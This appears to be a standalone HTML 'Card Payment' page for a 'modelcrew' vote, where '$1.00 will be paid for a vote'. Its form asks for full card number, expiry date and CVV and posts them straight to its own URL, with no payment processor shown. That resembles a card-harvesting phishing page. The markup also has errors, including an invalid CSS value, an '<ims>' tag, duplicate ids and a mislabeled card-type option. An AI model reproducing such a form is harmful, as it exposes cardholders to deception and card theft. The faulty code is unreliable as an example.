<!DOCTYPE html>
<html>
<head>
  
	<title> Card Payment</title>
  <link rel="icon" type="image/x-icon" href="https://cdn.pixabay.com/photo/2013/07/12/15/21/walking-149724_640.png">
	<style type="text/css">body {
    font-family: Arial, sans-serif;
    background-color:0px 0px 10px rgb(33, 28, 28);;
    padding: 30px;
  }
  
  h1 {
    text-align: left;
    color:rgb(253, 255, 255);
    size: 30ch;
    font-size:300%;
  }
  
  form {
    width: 400px;
    margin: 0 auto;
    background-color:#277028;
    padding: 20px;
    border-radius: 20px;
    box-shadow: 0px 2px 10px rgba(171, 182, 174, 0.014);
  }
  
  label {
    display: block;
    font-weight: bold;
    margin-bottom: 5px;
    color:#f9f0f0;
  }
  
  input[type="text"] {
    display: inline-block;
    width: 90%;
    padding: 10px;
    margin-bottom: 10px;
    border-radius: 20px;
    border: 1px solid #fff5f5;
  }
  
  input[type="submit"] {
    display:inline;
    animation: reverse;
    animation-duration: 2ms;
    width: 40%;
    padding: 10px;
    background-color: #4caf50;
    color: #080707;
    font-weight: bold;
    border-radius: 20px;
    border: none;
    cursor: pointer;
    align-items: center;
  }
  
  input[type="submit"]:hover {
    background-color: #1f9fb8;
  }
  .max{
    width: 15%;

  }
  #background-video {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    object-fit: cover;
    z-index: -1;
    }
    p{
      color:#fcfeff;
      text-align:center;
      
    }
    body{
      background-color: #2e9b6f;

    }
  /* CSS styles for the favicon */
  /* Example: Rotate the favicon */
  @keyframes rotate {
    from {
      transform: rotate(0deg);
    }
    to {
      transform: rotate(360deg);
    }
  }

  /* Apply the animation to the favicon */
  /* Note: This may not work in all browsers */
  /* Adjust the animation duration and other properties as needed */
  link[rel="icon"] {
    animation: rotate 2s linear infinite;
  }


	</style>
	<script>
    window.addEventListener('DOMContentLoaded', (event) => {
      const cvvInput = document.getElementById('cvv');
      cvvInput.addEventListener('input', formatCVV);
      
      function formatCVV() {
        let cvv = cvvInput.value;
        cvv = cvv.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        
        if (cvv.length > 4) {
          cvv = cvv.slice(0, 4);
        }
        
        cvvInput.value = cvv;
      }
    });
    window.addEventListener('DOMContentLoaded', (event) => {
      const cardNumberInput = document.getElementById('card_number');
      cardNumberInput.addEventListener('input', formatCardNumber);
      
      function formatCardNumber() {
        let cardNumber = cardNumberInput.value;
        cardNumber = cardNumber.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        
        if (cardNumber.length > 16) {
          cardNumber = cardNumber.slice(0, 16);
        }
        
        let formattedNumber = '';
        for (let i = 0; i < cardNumber.length; i++) {
          if (i > 0 && i % 4 === 0) {
            formattedNumber += '-';
          }
          formattedNumber += cardNumber.charAt(i);
        }
        
        cardNumberInput.value = formattedNumber;
      }
    });
    window.addEventListener('DOMContentLoaded', (event) => {
      const expiryDateInput = document.getElementById('expiry_date');
      expiryDateInput.addEventListener('input', formatExpiryDate);
      
      function formatExpiryDate() {
        let expiryDate = expiryDateInput.value;
        expiryDate = expiryDate.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        
        if (expiryDate.length > 4) {
          expiryDate = expiryDate.slice(0, 4);
        }
        
        let formattedDate = '';
        for (let i = 0; i < expiryDate.length; i++) {
          if (i === 2) {
            formattedDate += '/';
          }
          formattedDate += expiryDate.charAt(i);
        }
        
        expiryDateInput.value = formattedDate;
      }
    });
    </script>
</head>
<body>
<h1><ims src="https://www.canva.com/design/DAFmr72neZ4/UpGGexDmQCC6LS5OmKZo_A/edit?utm_content=DAFmr72neZ4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton">modelcrew</h1>
<p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$1.00&nbsp;will be paid for a vote&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;</p>

<form action="" method="POST"><label for="card_number">Card Number:</label><input id="card_number" name="card_number" pattern="[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{4}" required="" title="Please enter a valid card number" type="text" /> <label for="expiry_date">Expiry Date (MM/YY):</label> <input id="expiry_date" name="expiry_date" pattern="[0-9]{2}\/[0-9]{2}" required="" title="Please enter the expiry date in MM/YY format" type="text" /> <label for="cvv">CVV:</label> <input id="cvv" name="cvv" required="" type="text" /> <strong>Visa<input checked="checked" id="visa" name="card_type" type="radio" value="visa" /></strong><img alt="" src="https://scontent.facc5-1.fna.fbcdn.net/v/t39.30808-6/345642874_1314934626104866_881004589387965683_n.jpg?stp=dst-jpg_p843x403&_nc_cat=107&cb=99be929b-59f725be&ccb=1-7&_nc_sid=730e14&_nc_eui2=AeEznXzrZ8s7mnuujefxl6iOSWcXlPt52mxJZxeU-3nabKQJSN0xoGfeknxUxlE5U-UO7cpZ2vLALgddkgR5pQWB&_nc_ohc=NeTwekFhHjoAX-1VOGf&_nc_zt=23&_nc_ht=scontent.facc5-1.fna&oh=00_AfB6jr6DTnmmaDnNgN6f2P4Qosccxf_8xEYuVM4edMtXvA&oe=6498CDB2" style="border-width: 7px; border-style: solid; margin-left: 4px; margin-right: 4px; float: right; width: 250px; height: 353px;" /><strong> </strong><label for="visa"><img alt="" src="https://th.bing.com/th/id/R.8176c0cee9cd559be1a9bf4748abb31f?rik=BSefbnCLRK5K4w&pid=ImgRaw&r=0" style="width: 64px; height: 24px;" /></label><br />
<strong>Debit</strong><input id="debit" name="card_type" type="radio" value="debit" /> <label for="visa"><img alt="" src="https://th.bing.com/th/id/R.3199df0e6d1daa6b20a55c39e60096d8?rik=DBXdYJQdMKduwA&amp;pid=ImgRaw&amp;r=0" style="width: 64px; height: 36px;" /></label>

<p><strong>American Express</strong><strong><input checked="checked" id="visa" name="card_type" type="radio" value="visa" /></strong></p>

<p><img alt="" src="https://cdn.icon-icons.com/icons2/1186/PNG/512/1490135020-american-express_82257.png" style="width: 60px; height: 49px;" /><br />
  <img alt="" src="https://webstockreview.net/images/checkmark-clipart-correct-tick-14.png" style="width: 60px; height: 49px;" /> 
<input type="submit" value="Submit" />&nbsp;</p>
</form>
<video id="background-video" autoplay muted loop>
  <source src="walk.mp4" type="video/mp4">
</video>

</body>
</html>
